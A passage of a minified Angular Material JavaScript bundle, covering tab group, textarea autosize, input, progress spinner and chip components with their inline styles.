mat-focus-indicator","role","tab","matTabLabelWrapper","","mat-ripple","","cdkMonitorElementFocus","",3,"id","mat-tab-label-active","ngClass","disabled","matRippleDisabled","click","cdkFocusChange",4,"ngFor","ngForOf"],[1,"mat-tab-body-wrapper"],["tabBodyWrapper",""],["role","tabpanel",3,"id","mat-tab-body-active","ngClass","content","position","origin","animationDuration","preserveContent","_onCentered","_onCentering",4,"ngFor","ngForOf"],["role","tab","matTabLabelWrapper","","mat-ripple","","cdkMonitorElementFocus","",1,"mat-tab-label","mat-focus-indicator",3,"id","ngClass","disabled","matRippleDisabled","click","cdkFocusChange"],[1,"mat-tab-label-content"],[3,"ngIf","ngIfElse"],["tabTextLabel",""],[3,"cdkPortalOutlet"],["role","tabpanel",3,"id","ngClass","content","position","origin","animationDuration","preserveContent","_onCentered","_onCentering"]],template:function(e,i){1&e&&(m(0,"mat-tab-header",0,1),he("indexFocused",function(r){return i._focusChanged(r)})("selectFocusedIndex",function(r){return i.selectedIndex=r}),ne(2,l0e,5,15,"div",2),u(),m(3,"div",3,4),ne(5,d0e,1,11,"mat-tab-body",5),u()),2&e&&(V("selectedIndex",i.selectedIndex||0)("disableRipple",i.disableRipple)("disablePagination",i.disablePagination),C(2),V("ngForOf",i._tabs),C(1),Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode),C(2),V("ngForOf",i._tabs))},dependencies:[ig,Zi,Ri,Cu,Dl,dpe,wF,DF,v0e],styles:[".mat-tab-group{display:flex;flex-direction:column;max-width:100%}.mat-tab-group.mat-tab-group-inverted-header{flex-direction:column-reverse}.mat-tab-label{height:48px;padding:0 24px;cursor:pointer;box-sizing:border-box;opacity:.6;min-width:160px;text-align:center;display:inline-flex;justify-content:center;align-items:center;white-space:nowrap;position:relative}.mat-tab-label:focus{outline:none}.mat-tab-label:focus:not(.mat-tab-disabled){opacity:1}.mat-tab-label.mat-tab-disabled{cursor:default}.cdk-high-contrast-active .mat-tab-label.mat-tab-disabled{opacity:.5}.mat-tab-label .mat-tab-label-content{display:inline-flex;justify-content:center;align-items:center;white-space:nowrap}.cdk-high-contrast-active .mat-tab-label{opacity:1}@media(max-width: 599px){.mat-tab-label{padding:0 12px}}@media(max-width: 959px){.mat-tab-label{padding:0 12px}}.mat-tab-group[mat-stretch-tabs]>.mat-tab-header .mat-tab-label{flex-basis:0;flex-grow:1}.mat-tab-body-wrapper{position:relative;overflow:hidden;display:flex;transition:height 500ms cubic-bezier(0.35, 0, 0.25, 1)}.mat-tab-body-wrapper._mat-animation-noopable{transition:none !important;animation:none !important}.mat-tab-body{top:0;left:0;right:0;bottom:0;position:absolute;display:block;overflow:hidden;outline:0;flex-basis:100%}.mat-tab-body.mat-tab-body-active{position:relative;overflow-x:hidden;overflow-y:auto;z-index:1;flex-grow:1}.mat-tab-group.mat-tab-group-dynamic-height .mat-tab-body.mat-tab-body-active{overflow-y:hidden}"],encapsulation:2}),t})(),SF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,yu,Od,$y,Xy,la]}),t})();const kF=ym({passive:!0});let x0e=(()=>{class t{constructor(e,i){this._platform=e,this._ngZone=i,this._monitoredElements=new Map}monitor(e){if(!this._platform.isBrowser)return ha;const i=Gr(e),n=this._monitoredElements.get(i);if(n)return n.subject;const r=new J,c="cdk-text-field-autofilled",d=T=>{"cdk-text-field-autofill-start"!==T.animationName||i.classList.contains(c)?"cdk-text-field-autofill-end"===T.animationName&&i.classList.contains(c)&&(i.classList.remove(c),this._ngZone.run(()=>r.next({target:T.target,isAutofilled:!1}))):(i.classList.add(c),this._ngZone.run(()=>r.next({target:T.target,isAutofilled:!0})))};return this._ngZone.runOutsideAngular(()=>{i.addEventListener("animationstart",d,kF),i.classList.add("cdk-text-field-autofill-monitored")}),this._monitoredElements.set(i,{subject:r,unlisten:()=>{i.removeEventListener("animationstart",d,kF)}}),r}stopMonitoring(e){const i=Gr(e),n=this._monitoredElements.get(i);n&&(n.unlisten(),n.subject.complete(),i.classList.remove("cdk-text-field-autofill-monitored"),i.classList.remove("cdk-text-field-autofilled"),this._monitoredElements.delete(i))}ngOnDestroy(){this._monitoredElements.forEach((e,i)=>this.stopMonitoring(i))}}return t.\u0275fac=function(e){return new(e||t)(At(cr),At(qi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Go=(()=>{class t{constructor(e,i,n,r){this._elementRef=e,this._platform=i,this._ngZone=n,this._destroyed=new J,this._enabled=!0,this._previousMinRows=-1,this._isViewInited=!1,this._handleFocusEvent=c=>{this._hasFocus="focus"===c.type},this._document=r,this._textareaElement=this._elementRef.nativeElement}get minRows(){return this._minRows}set minRows(e){this._minRows=Uo(e),this._setMinHeight()}get maxRows(){return this._maxRows}set maxRows(e){this._maxRows=Uo(e),this._setMaxHeight()}get enabled(){return this._enabled}set enabled(e){e=wi(e),this._enabled!==e&&((this._enabled=e)?this.resizeToFitContent(!0):this.reset())}get placeholder(){return this._textareaElement.placeholder}set placeholder(e){this._cachedPlaceholderHeight=void 0,e?this._textareaElement.setAttribute("placeholder",e):this._textareaElement.removeAttribute("placeholder"),this._cacheTextareaPlaceholderHeight()}_setMinHeight(){const e=this.minRows&&this._cachedLineHeight?this.minRows*this._cachedLineHeight+"px":null;e&&(this._textareaElement.style.minHeight=e)}_setMaxHeight(){const e=this.maxRows&&this._cachedLineHeight?this.maxRows*this._cachedLineHeight+"px":null;e&&(this._textareaElement.style.maxHeight=e)}ngAfterViewInit(){this._platform.isBrowser&&(this._initialHeight=this._textareaElement.style.height,this.resizeToFitContent(),this._ngZone.runOutsideAngular(()=>{Tc(this._getWindow(),"resize").pipe(mw(16),ea(this._destroyed)).subscribe(()=>this.resizeToFitContent(!0)),this._textareaElement.addEventListener("focus",this._handleFocusEvent),this._textareaElement.addEventListener("blur",this._handleFocusEvent)}),this._isViewInited=!0,this.resizeToFitContent(!0))}ngOnDestroy(){this._textareaElement.removeEventListener("focus",this._handleFocusEvent),this._textareaElement.removeEventListener("blur",this._handleFocusEvent),this._destroyed.next(),this._destroyed.complete()}_cacheTextareaLineHeight(){if(this._cachedLineHeight)return;let e=this._textareaElement.cloneNode(!1);e.rows=1,e.style.position="absolute",e.style.visibility="hidden",e.style.border="none",e.style.padding="0",e.style.height="",e.style.minHeight="",e.style.maxHeight="",e.style.overflow="hidden",this._textareaElement.parentNode.appendChild(e),this._cachedLineHeight=e.clientHeight,e.remove(),this._setMinHeight(),this._setMaxHeight()}_measureScrollHeight(){const e=this._textareaElement,i=e.style.marginBottom||"",n=this._platform.FIREFOX,r=n&&this._hasFocus,c=n?"cdk-textarea-autosize-measuring-firefox":"cdk-textarea-autosize-measuring";r&&(e.style.marginBottom=`${e.clientHeight}px`),e.classList.add(c);const d=e.scrollHeight-4;return e.classList.remove(c),r&&(e.style.marginBottom=i),d}_cacheTextareaPlaceholderHeight(){if(!this._isViewInited||null!=this._cachedPlaceholderHeight)return;if(!this.placeholder)return void(this._cachedPlaceholderHeight=0);const e=this._textareaElement.value;this._textareaElement.value=this._textareaElement.placeholder,this._cachedPlaceholderHeight=this._measureScrollHeight(),this._textareaElement.value=e}ngDoCheck(){this._platform.isBrowser&&this.resizeToFitContent()}resizeToFitContent(e=!1){if(!this._enabled||(this._cacheTextareaLineHeight(),this._cacheTextareaPlaceholderHeight(),!this._cachedLineHeight))return;const i=this._elementRef.nativeElement,n=i.value;if(!e&&this._minRows===this._previousMinRows&&n===this._previousValue)return;const r=this._measureScrollHeight(),c=Math.max(r,this._cachedPlaceholderHeight||0);i.style.height=`${c}px`,this._ngZone.runOutsideAngular(()=>{"undefined"!=typeof requestAnimationFrame?requestAnimationFrame(()=>this._scrollToCaretPosition(i)):setTimeout(()=>this._scrollToCaretPosition(i))}),this._previousValue=n,this._previousMinRows=this._minRows}reset(){void 0!==this._initialHeight&&(this._textareaElement.style.height=this._initialHeight)}_noopInputHandler(){}_getDocument(){return this._document||document}_getWindow(){return this._getDocument().defaultView||window}_scrollToCaretPosition(e){const{selectionStart:i,selectionEnd:n}=e;!this._destroyed.isStopped&&this._hasFocus&&e.setSelectionRange(i,n)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(cr),Ee(qi),Ee(ga,8))},t.\u0275dir=Ot({type:t,selectors:[["textarea","cdkTextareaAutosize",""]],hostAttrs:["rows","1",1,"cdk-textarea-autosize"],hostBindings:function(e,i){1&e&&he("input",function(){return i._noopInputHandler()})},inputs:{minRows:["cdkAutosizeMinRows","minRows"],maxRows:["cdkAutosizeMaxRows","maxRows"],enabled:["cdkTextareaAutosize","enabled"],placeholder:"placeholder"},exportAs:["cdkTextareaAutosize"]}),t})(),PF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const c8=new ni("MAT_INPUT_VALUE_ACCESSOR"),w0e=["button","checkbox","file","hidden","image","radio","range","reset","submit"];let I0e=0;const R0e=Uw(class{constructor(t,a,e,i){this._defaultErrorStateMatcher=t,this._parentForm=a,this._parentFormGroup=e,this.ngControl=i,this.stateChanges=new J}});let Xa=(()=>{class t extends R0e{constructor(e,i,n,r,c,d,T,k,q,Y){super(d,r,c,n),this._elementRef=e,this._platform=i,this._autofillMonitor=k,this._formField=Y,this._uid="mat-input-"+I0e++,this.focused=!1,this.stateChanges=new J,this.controlType="mat-input",this.autofilled=!1,this._disabled=!1,this._type="text",this._readonly=!1,this._neverEmptyInputTypes=["date","datetime","datetime-local","month","time","week"].filter(Re=>bz().has(Re)),this._iOSKeyupListener=Re=>{const Fe=Re.target;!Fe.value&&0===Fe.selectionStart&&0===Fe.selectionEnd&&(Fe.setSelectionRange(1,1),Fe.setSelectionRange(0,0))};const te=this._elementRef.nativeElement,pe=te.nodeName.toLowerCase();this._inputValueAccessor=T||te,this._previousNativeValue=this.value,this.id=this.id,i.IOS&&q.runOutsideAngular(()=>{e.nativeElement.addEventListener("keyup",this._iOSKeyupListener)}),this._isServer=!this._platform.isBrowser,this._isNativeSelect="select"===pe,this._isTextarea="textarea"===pe,this._isInFormField=!!Y,this._isNativeSelect&&(this.controlType=te.multiple?"mat-native-select-multiple":"mat-native-select")}get disabled(){return this.ngControl&&null!==this.ngControl.disabled?this.ngControl.disabled:this._disabled}set disabled(e){this._disabled=wi(e),this.focused&&(this.focused=!1,this.stateChanges.next())}get id(){return this._id}set id(e){this._id=e||this._uid}get required(){var e,i,n,r;return null!==(r=null!==(e=this._required)&&void 0!==e?e:null===(n=null===(i=this.ngControl)||void 0===i?void 0:i.control)||void 0===n?void 0:n.hasValidator(Td.required))&&void 0!==r&&r}set required(e){this._required=wi(e)}get type(){return this._type}set type(e){this._type=e||"text",this._validateType(),!this._isTextarea&&bz().has(this._type)&&(this._elementRef.nativeElement.type=this._type)}get value(){return this._inputValueAccessor.value}set value(e){e!==this.value&&(this._inputValueAccessor.value=e,this.stateChanges.next())}get readonly(){return this._readonly}set readonly(e){this._readonly=wi(e)}ngAfterViewInit(){this._platform.isBrowser&&this._autofillMonitor.monitor(this._elementRef.nativeElement).subscribe(e=>{this.autofilled=e.isAutofilled,this.stateChanges.next()})}ngOnChanges(){this.stateChanges.next()}ngOnDestroy(){this.stateChanges.complete(),this._platform.isBrowser&&this._autofillMonitor.stopMonitoring(this._elementRef.nativeElement),this._platform.IOS&&this._elementRef.nativeElement.removeEventListener("keyup",this._iOSKeyupListener)}ngDoCheck(){this.ngControl&&this.updateErrorState(),this._dirtyCheckNativeValue(),this._dirtyCheckPlaceholder()}focus(e){this._elementRef.nativeElement.focus(e)}_focusChanged(e){e!==this.focused&&(this.focused=e,this.stateChanges.next())}_onInput(){}_dirtyCheckPlaceholder(){var e;const i=this._formField,n=!i||"legacy"!==i.appearance||null!==(e=i._hasLabel)&&void 0!==e&&e.call(i)?this.placeholder:null;if(n!==this._previousPlaceholder){const r=this._elementRef.nativeElement;this._previousPlaceholder=n,n?r.setAttribute("placeholder",n):r.removeAttribute("placeholder")}}_dirtyCheckNativeValue(){const e=this._elementRef.nativeElement.value;this._previousNativeValue!==e&&(this._previousNativeValue=e,this.stateChanges.next())}_validateType(){w0e.indexOf(this._type)}_isNeverEmpty(){return this._neverEmptyInputTypes.indexOf(this._type)>-1}_isBadInput(){let e=this._elementRef.nativeElement.validity;return e&&e.badInput}get empty(){return!(this._isNeverEmpty()||this._elementRef.nativeElement.value||this._isBadInput()||this.autofilled)}get shouldLabelFloat(){if(this._isNativeSelect){const e=this._elementRef.nativeElement,i=e.options[0];return this.focused||e.multiple||!this.empty||!!(e.selectedIndex>-1&&i&&i.label)}return this.focused||!this.empty}setDescribedByIds(e){e.length?this._elementRef.nativeElement.setAttribute("aria-describedby",e.join(" ")):this._elementRef.nativeElement.removeAttribute("aria-describedby")}onContainerClick(){this.focused||this.focus()}_isInlineSelect(){const e=this._elementRef.nativeElement;return this._isNativeSelect&&(e.multiple||e.size>1)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(cr),Ee(fm,10),Ee(y1,8),Ee(lg,8),Ee(mp),Ee(c8,10),Ee(x0e),Ee(qi),Ee(cb,8))},t.\u0275dir=Ot({type:t,selectors:[["input","matInput",""],["textarea","matInput",""],["select","matNativeControl",""],["input","matNativeControl",""],["textarea","matNativeControl",""]],hostAttrs:[1,"mat-input-element","mat-form-field-autofill-control"],hostVars:12,hostBindings:function(e,i){1&e&&he("focus",function(){return i._focusChanged(!0)})("blur",function(){return i._focusChanged(!1)})("input",function(){return i._onInput()}),2&e&&(Gs("disabled",i.disabled)("required",i.required),Rt("id",i.id)("data-placeholder",i.placeholder)("name",i.name||null)("readonly",i.readonly&&!i._isNativeSelect||null)("aria-invalid",i.empty&&i.required?null:i.errorState)("aria-required",i.required),Ct("mat-input-server",i._isServer)("mat-native-select-inline",i._isInlineSelect()))},inputs:{disabled:"disabled",id:"id",placeholder:"placeholder",name:"name",required:"required",type:"type",errorStateMatcher:"errorStateMatcher",userAriaDescribedBy:["aria-describedby","userAriaDescribedBy"],value:"value",readonly:"readonly"},exportAs:["matInput"],features:[ki([{provide:sb,useExisting:t}]),ci,sa]}),t})(),l8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[mp],imports:[PF,r8,la,PF,r8]}),t})();function S0e(t,a){if(1&t&&(fi(),it(0,"circle",4)),2&t){const e=B(),i=Ti(1);ri("animation-name","mat-progress-spinner-stroke-rotate-"+e._spinnerAnimationLabel)("stroke-dashoffset",e._getStrokeDashOffset(),"px")("stroke-dasharray",e._getStrokeCircumference(),"px")("stroke-width",e._getCircleStrokeWidth(),"%")("transform-origin",e._getCircleTransformOrigin(i)),Rt("r",e._getCircleRadius())}}function k0e(t,a){if(1&t&&(fi(),it(0,"circle",4)),2&t){const e=B(),i=Ti(1);ri("stroke-dashoffset",e._getStrokeDashOffset(),"px")("stroke-dasharray",e._getStrokeCircumference(),"px")("stroke-width",e._getCircleStrokeWidth(),"%")("transform-origin",e._getCircleTransformOrigin(i)),Rt("r",e._getCircleRadius())}}const O0e=Pd(class{constructor(t){this._elementRef=t}},"primary"),N0e=new ni("mat-progress-spinner-default-options",{providedIn:"root",factory:function L0e(){return{diameter:100}}});class xl extends O0e{constructor(a,e,i,n,r,c,d,T){super(a),this._document=i,this._diameter=100,this._value=0,this._resizeSubscription=I.EMPTY,this.mode="determinate";const k=xl._diameters;this._spinnerAnimationLabel=this._getSpinnerAnimationLabel(),k.has(i.head)||k.set(i.head,new Set([100])),this._noopAnimations="NoopAnimations"===n&&!!r&&!r._forceAnimations,"mat-spinner"===a.nativeElement.nodeName.toLowerCase()&&(this.mode="indeterminate"),r&&(r.color&&(this.color=this.defaultColor=r.color),r.diameter&&(this.diameter=r.diameter),r.strokeWidth&&(this.strokeWidth=r.strokeWidth)),e.isBrowser&&e.SAFARI&&d&&c&&T&&(this._resizeSubscription=d.change(150).subscribe(()=>{"indeterminate"===this.mode&&T.run(()=>c.markForCheck())}))}get diameter(){return this._diameter}set diameter(a){this._diameter=Uo(a),this._spinnerAnimationLabel=this._getSpinnerAnimationLabel(),this._styleRoot&&this._attachStyleNode()}get strokeWidth(){return this._strokeWidth||this.diameter/10}set strokeWidth(a){this._strokeWidth=Uo(a)}get value(){return"determinate"===this.mode?this._value:0}set value(a){this._value=Math.max(0,Math.min(100,Uo(a)))}ngOnInit(){const a=this._elementRef.nativeElement;this._styleRoot=_3(a)||this._document.head,this._attachStyleNode(),a.classList.add("mat-progress-spinner-indeterminate-animation")}ngOnDestroy(){this._resizeSubscription.unsubscribe()}_getCircleRadius(){return(this.diameter-10)/2}_getViewBox(){const a=2*this._getCircleRadius()+this.strokeWidth;return`0 0 ${a} ${a}`}_getStrokeCircumference(){return 2*Math.PI*this._getCircleRadius()}_getStrokeDashOffset(){return"determinate"===this.mode?this._getStrokeCircumference()*(100-this._value)/100:null}_getCircleStrokeWidth(){return this.strokeWidth/this.diameter*100}_getCircleTransformOrigin(a){var e;const i=50*(null!==(e=a.currentScale)&&void 0!==e?e:1);return`${i}% ${i}%`}_attachStyleNode(){const a=this._styleRoot,e=this._diameter,i=xl._diameters;let n=i.get(a);if(!n||!n.has(e)){const r=this._document.createElement("style");r.setAttribute("mat-spinner-animation",this._spinnerAnimationLabel),r.textContent=this._getAnimationText(),a.appendChild(r),n||(n=new Set,i.set(a,n)),n.add(e)}}_getAnimationText(){const a=this._getStrokeCircumference();return"\n @keyframes mat-progress-spinner-stroke-rotate-DIAMETER {\n    0%      { stroke-dashoffset: START_VALUE;  transform: rotate(0); }\n    12.5%   { stroke-dashoffset: END_VALUE;    transform: rotate(0); }\n    12.5001%  { stroke-dashoffset: END_VALUE;    transform: rotateX(180deg) rotate(72.5deg); }\n    25%     { stroke-dashoffset: START_VALUE;  transform: rotateX(180deg) rotate(72.5deg); }\n\n    25.0001%   { stroke-dashoffset: START_VALUE;  transform: rotate(270deg); }\n    37.5%   { stroke-dashoffset: END_VALUE;    transform: rotate(270deg); }\n    37.5001%  { stroke-dashoffset: END_VALUE;    transform: rotateX(180deg) rotate(161.5deg); }\n    50%     { stroke-dashoffset: START_VALUE;  transform: rotateX(180deg) rotate(161.5deg); }\n\n    50.0001%  { stroke-dashoffset: START_VALUE;  transform: rotate(180deg); }\n    62.5%   { stroke-dashoffset: END_VALUE;    transform: rotate(180deg); }\n    62.5001%  { stroke-dashoffset: END_VALUE;    transform: rotateX(180deg) rotate(251.5deg); }\n    75%     { stroke-dashoffset: START_VALUE;  transform: rotateX(180deg) rotate(251.5deg); }\n\n    75.0001%  { stroke-dashoffset: START_VALUE;  transform: rotate(90deg); }\n    87.5%   { stroke-dashoffset: END_VALUE;    transform: rotate(90deg); }\n    87.5001%  { stroke-dashoffset: END_VALUE;    transform: rotateX(180deg) rotate(341.5deg); }\n    100%    { stroke-dashoffset: START_VALUE;  transform: rotateX(180deg) rotate(341.5deg); }\n  }\n".replace(/START_VALUE/g,""+.95*a).replace(/END_VALUE/g,""+.2*a).replace(/DIAMETER/g,`${this._spinnerAnimationLabel}`)}_getSpinnerAnimationLabel(){return this.diameter.toString().replace(".","_")}}xl._diameters=new WeakMap,xl.\u0275fac=function(a){return new(a||xl)(Ee(mi),Ee(cr),Ee(ga,8),Ee(ar,8),Ee(N0e),Ee(Ma),Ee(bm),Ee(qi))},xl.\u0275cmp=Wt({type:xl,selectors:[["mat-progress-spinner"],["mat-spinner"]],hostAttrs:["role","progressbar","tabindex","-1",1,"mat-progress-spinner","mat-spinner"],hostVars:10,hostBindings:function(a,e){2&a&&(Rt("aria-valuemin","determinate"===e.mode?0:null)("aria-valuemax","determinate"===e.mode?100:null)("aria-valuenow","determinate"===e.mode?e.value:null)("mode",e.mode),ri("width",e.diameter,"px")("height",e.diameter,"px"),Ct("_mat-animation-noopable",e._noopAnimations))},inputs:{color:"color",diameter:"diameter",strokeWidth:"strokeWidth",mode:"mode",value:"value"},exportAs:["matProgressSpinner"],features:[ci],decls:4,vars:8,consts:[["preserveAspectRatio","xMidYMid meet","focusable","false","aria-hidden","true",3,"ngSwitch"],["svg",""],["cx","50%","cy","50%",3,"animation-name","stroke-dashoffset","stroke-dasharray","stroke-width","transform-origin",4,"ngSwitchCase"],["cx","50%","cy","50%",3,"stroke-dashoffset","stroke-dasharray","stroke-width","transform-origin",4,"ngSwitchCase"],["cx","50%","cy","50%"]],template:function(a,e){1&a&&(fi(),m(0,"svg",0,1),ne(2,S0e,1,11,"circle",2),ne(3,k0e,1,9,"circle",3),u()),2&a&&(ri("width",e.diameter,"px")("height",e.diameter,"px"),V("ngSwitch","indeterminate"===e.mode),Rt("viewBox",e._getViewBox()),C(2),V("ngSwitchCase",!0),C(1),V("ngSwitchCase",!1))},dependencies:[Jf,p1],styles:[".mat-progress-spinner{display:block;position:relative;overflow:hidden}.mat-progress-spinner svg{position:absolute;transform:rotate(-90deg);top:0;left:0;transform-origin:center;overflow:visible}.mat-progress-spinner circle{fill:rgba(0,0,0,0);transition:stroke-dashoffset 225ms linear}.cdk-high-contrast-active .mat-progress-spinner circle{stroke:CanvasText}.mat-progress-spinner[mode=indeterminate] svg{animation:mat-progress-spinner-linear-rotate 2000ms linear infinite}.mat-progress-spinner[mode=indeterminate] circle{transition-property:stroke;animation-duration:4000ms;animation-timing-function:cubic-bezier(0.35, 0, 0.25, 1);animation-iteration-count:infinite}.mat-progress-spinner._mat-animation-noopable svg,.mat-progress-spinner._mat-animation-noopable circle{animation:none;transition:none}@keyframes mat-progress-spinner-linear-rotate{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}@keyframes mat-progress-spinner-stroke-rotate-100{0%{stroke-dashoffset:268.606171575px;transform:rotate(0)}12.5%{stroke-dashoffset:56.5486677px;transform:rotate(0)}12.5001%{stroke-dashoffset:56.5486677px;transform:rotateX(180deg) rotate(72.5deg)}25%{stroke-dashoffset:268.606171575px;transform:rotateX(180deg) rotate(72.5deg)}25.0001%{stroke-dashoffset:268.606171575px;transform:rotate(270deg)}37.5%{stroke-dashoffset:56.5486677px;transform:rotate(270deg)}37.5001%{stroke-dashoffset:56.5486677px;transform:rotateX(180deg) rotate(161.5deg)}50%{stroke-dashoffset:268.606171575px;transform:rotateX(180deg) rotate(161.5deg)}50.0001%{stroke-dashoffset:268.606171575px;transform:rotate(180deg)}62.5%{stroke-dashoffset:56.5486677px;transform:rotate(180deg)}62.5001%{stroke-dashoffset:56.5486677px;transform:rotateX(180deg) rotate(251.5deg)}75%{stroke-dashoffset:268.606171575px;transform:rotateX(180deg) rotate(251.5deg)}75.0001%{stroke-dashoffset:268.606171575px;transform:rotate(90deg)}87.5%{stroke-dashoffset:56.5486677px;transform:rotate(90deg)}87.5001%{stroke-dashoffset:56.5486677px;transform:rotateX(180deg) rotate(341.5deg)}100%{stroke-dashoffset:268.606171575px;transform:rotateX(180deg) rotate(341.5deg)}}"],encapsulation:2,changeDetection:0});let OF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,rn,la]}),t})();const W0e=["*"],NF=new ni("MatChipRemove"),LF=new ni("MatChipAvatar"),zF=new ni("MatChipTrailingIcon");class F0e{constructor(a){this._elementRef=a}}const V0e=dp(Pd(El(F0e),"primary"),-1);let db=(()=>{class t extends V0e{constructor(e,i,n,r,c,d,T,k){super(e),this._ngZone=i,this._changeDetectorRef=c,this._hasFocus=!1,this.chipListSelectable=!0,this._chipListMultiple=!1,this._chipListDisabled=!1,this.role="option",this._selected=!1,this._selectable=!0,this._disabled=!1,this._removable=!0,this._onFocus=new J,this._onBlur=new J,this.selectionChange=new Tt,this.destroyed=new Tt,this.removed=new Tt,this._addHostClassName(),this._chipRippleTarget=d.createElement("div"),this._chipRippleTarget.classList.add("mat-chip-ripple"),this._elementRef.nativeElement.appendChild(this._chipRippleTarget),this._chipRipple=new DW(this,i,this._chipRippleTarget,n),this._chipRipple.setupTriggerEvents(e),this.rippleConfig=r||{},this._animationsDisabled="NoopAnimations"===T,this.tabIndex=null!=k&&parseInt(k)||-1}get rippleDisabled(){return this.disabled||this.disableRipple||this._animationsDisabled||!!this.rippleConfig.disabled}get selected(){return this._selected}set selected(e){const i=wi(e);i!==this._selected&&(this._selected=i,this._dispatchSelectionChange())}get value(){return void 0!==this._value?this._value:this._elementRef.nativeElement.textContent}set value(e){this._value=e}get selectable(){return this._selectable&&this.chipListSelectable}set selectable(e){this._selectable=wi(e)}get disabled(){return this._chipListDisabled||this._disabled}set disabled(e){this._disabled=wi(e)}get removable(){return this._removable}set removable(e){this._removable=wi(e)}get ariaSelected(){return this.selectable&&(this._chipListMultiple||this.selected)?this.selected.toString():null}_addHostClassName(){const e="mat-basic-chip",i=this._elementRef.nativeElement;i.hasAttribute(e)||i.tagName.toLowerCase()===e?i.classList.add(e):i.classList.add("mat-standard-chip")}ngOnDestroy(){this.destroyed.emit({chip:this}),this._chipRipple._removeTriggerEvents()}select(){this._selected||(this._selected=!0,this._dispatchSelectionChange(),this._changeDetectorRef.markForCheck())}deselect(){this._selected&&(this._selected=!1,this._dispatchSelectionChange(),this._changeDetectorRef.markForCheck())}selectViaInteraction(){this._selected||(this._selected=!0,this._dispatchSelectionChange(!0),this._changeDetectorRef.markForCheck())}toggleSelected(e=!1){return this._selected=!this.selected,this._dispatchSelectionChange(e),this._changeDetectorRef.markForCheck(),this.selected}focus(){this._hasFocus||(this._elementRef.nativeElement.focus(),this._onFocus.next({chip:this})),this._hasFocus=!0}remove(){this.removable&&this.removed.emit({chip:this})}_handleClick(e){this.disabled&&e.preventDefault()}_handleKeydown(e){if(!this.disabled)switch(e.keyCode){case 46:case 8:this.remove(),e.preventDefault();break;case 32:this.selectable&&this.toggleSelected(!0),e.preventDefault()}}_blur(){this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{this._ngZone.run(()=>{this._hasFocus=!1,this._onBlur.next({chip:this})})})}_dispatchSelectionChange(e=!1){this.selectionChange.emit({source:this,isUserInput:e,selected:this._selected})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(cr),Ee(xW,8),Ee(Ma),Ee(ga),Ee(ar,8),Vr("tabindex"))},t.\u0275dir=Ot({type:t,selectors:[["mat-basic-chip"],["","mat-basic-chip",""],["mat-chip"],["","mat-chip",""]],contentQueries:function(e,i,n){if(1&e&&(fa(n,LF,5),fa(n,zF,5),fa(n,NF,5)),2&e){let r;Vt(r=Bt())&&(i.avatar=r.first),Vt(r=Bt())&&(i.trailingIcon=r.first),Vt(r=Bt())&&(i.removeIcon=r.first)}},hostAttrs:[1,"mat-chip","mat-focus-indicator"],hostVars:15,hostBindings:function(e,i){1&e&&he("click",function(r){return i._handleClick(r)})("keydown",function(r){return i._handleKeydown(r)})("focus",function(){return i.focus()})("blur",function(){return i._blur()}),2&e&&(Rt("tabindex",i.disabled?null:i.tabIndex)("role",i.role)("disabled",i.disabled||null)("aria-disabled",i.disabled.toString())("aria-selected",i.ariaSelected),Ct("mat-chip-selected",i.selected)("mat-chip-with-avatar",i.avatar)("mat-chip-with-trailing-icon",i.trailingIcon||i.removeIcon)("mat-chip-disabled",i.disabled)("_mat-animation-noopable",i._animationsDisabled))},inputs:{color:"color",disableRipple:"disableRipple",tabIndex:"tabIndex",role:"role",selected:"selected",value:"value",selectable:"selectable",disabled:"disabled",removable:"removable"},outputs:{selectionChange:"selectionChange",destroyed:"destroyed",removed:"removed"},exportAs:["matChip"],features:[ci]}),t})(),WF=(()=>{class t{constructor(e,i){this._parentChip=e,"BUTTON"===i.nativeElement.nodeName&&i.nativeElement.setAttribute("type","button")}_handleClick(e){const i=this._parentChip;i.removable&&!i.disabled&&i.remove(),e.stopPropagation(),e.preventDefault()}}return t.\u0275fac=function(e){return new(e||t)(Ee(db),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","matChipRemove",""]],hostAttrs:[1,"mat-chip-remove","mat-chip-trailing-icon"],hostBindings:function(e,i){1&e&&he("click",function(r){return i._handleClick(r)})},features:[ki([{provide:NF,useExisting:t}])]}),t})();const FF=new ni("mat-chips-default-options");let U0e=0,VF=(()=>{class t{constructor(e,i){this._elementRef=e,this._defaultOptions=i,this.focused=!1,this._addOnBlur=!1,this.separatorKeyCodes=this._defaultOptions.separatorKeyCodes,this.chipEnd=new Tt,this.placeholder="",this.id="mat-chip-list-input-"+U0e++,this._disabled=!1,this.inputElement=this._elementRef.nativeElement}set chipList(e){e&&(this._chipList=e,this._chipList.registerInput(this))}get addOnBlur(){return this._addOnBlur}set addOnBlur(e){this._addOnBlur=wi(e)}get disabled(){return this._disabled||this._chipList&&this._chipList.disabled}set disabled(e){this._disabled=wi(e)}get empty(){return!this.inputElement.value}ngOnChanges(){this._chipList.stateChanges.next()}ngOnDestroy(){this.chipEnd.complete()}ngAfterContentInit(){this._focusLastChipOnBackspace=this.empty}_keydown(e){if(e){if(9===e.keyCode&&!es(e,"shiftKey")&&this._chipList._allowFocusEscape(),8===e.keyCode&&this._focusLastChipOnBackspace)return this._chipList._keyManager.setLastItemActive(),void 